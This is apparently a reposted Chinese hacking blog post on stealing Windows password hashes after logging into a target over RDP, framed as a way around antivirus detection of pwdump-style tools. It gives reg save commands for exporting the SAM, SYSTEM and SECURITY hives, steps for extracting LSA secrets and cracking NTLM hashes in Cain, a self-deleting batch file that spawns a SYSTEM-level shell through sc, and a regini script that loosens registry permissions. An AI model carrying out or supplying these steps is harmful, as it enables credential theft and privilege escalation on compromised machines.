先看看「導出系統註冊表抓Hash」 的原文,挺不錯的思路。
==============
原文==============
如今登陸目標 3389後,我看好多人都已經習慣抓密碼 HASH而後回來彩虹表破解出明文了,或者傳個winloginhack來記錄 3389的登陸密碼。在我最近的幾回***中,發現 pwdump,fgdump這類工具如今已經難免殺了,並且這類工具都是要注入到 lsass.exe進程的,遇到 macfee這類的殺毒軟件,默認是繞不過去的 。Winlogin網上放出來的,通過個人測試,對 WIN2008是沒有效果的。今天瀏覽 BLOG,看到老外提到另外一種抓系統密碼 hash的技巧,通過實踐,發現可行,分享給你們。
首先使用 administrator權限登陸,而後使用 reg來保存註冊表中 HKLM下的 SECURITY,SAM,SYSTEM,注意這裏必須使用 reg的 save選項,export選項是不行的,
reg save hklm\sam sam.hive
reg save hklm\system ystem.hive
reg save hklm\security security.hive
圖1
而後把 sam.hive,system.hive,security.hive下載回本地,打開 CAIN,在"Decoders"標籤下,點"LSA Secrets", 點"+"來導入 system.hive和 security.hive.
圖2
這裏通常就能看到管理員的明文密碼了, 如圖 3,固然這裏的密碼,有時候也是歷史密碼。若是嘗試登陸不對,能夠來嘗試爆破 lm/ntlm hash.
圖3
要破解 LM/NTLM hash,首先點"cracker"標籤下的"LM&NTLM hashes",而後點"+",導入 sam.hive,注意因爲如今的 win2000之後都默認使用了 syskey,因此還要導入 system.hive中的 syskey的值,而後就能夠彩虹表破解了。如圖 4.如圖 5
圖4
圖5
後話:
這個方法不是對全部 WINDOWS發行版本都通用的,好比對 win 2000 sp4,win xp sp2就不行,對win2003,2008是管用的。具體工做列表以下:
Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works
============
註冊表提權讀取思路=================
一、如下是TheLostMind的思路
對用戶權限要求,默認XP SP3是導出不了的,我本地測試了,可是system權限是能夠的,那麼咱能夠建立一個system權限運行的CMD,而後再導出就OK了。
其餘系統上面沒測試過,你們本身整吧。
首先建立一個系統權限執行的CMD:
======================StartSystemCmd.bat=========
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0
=======================END=========================
而後導出文件。
==================SaveReg.bat=======================
@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
=====================END============================
而後倒入到CAIN裏面破吧。
二、個人思路
有時咱們不方便再跳出一個CMD,這時能夠利用命令regini.exe修改註冊表的訪問權限。
首先新建一個文本文件pri.ini,內容以下:
===========pri.ini===================
HKEY_LOCAL_MACHINE\SECURITY [1 17]
HKEY_LOCAL_MACHINE\SAM [1 17]
===================================
而後執行 regini.exe pri.ini
寫成批處理的內容以下:
================================
echo HKEY_LOCAL_MACHINE\SECURITY [1 17]>pri.ini
echo HKEY_LOCAL_MACHINE\SAM [1 17]>>pri.ini
regini.exe pri.ini
del pri.ini
================================
注:以上操做是將hklm\security與hklm\sam賦予Administrators和System徹底訪問的權限。hklm\system通常對管理員是放開訪問的,可視狀況修改。以上兩個表項對系統登錄相當重要,請謹慎修改。
最後就能夠直接利用reg導出註冊表內容。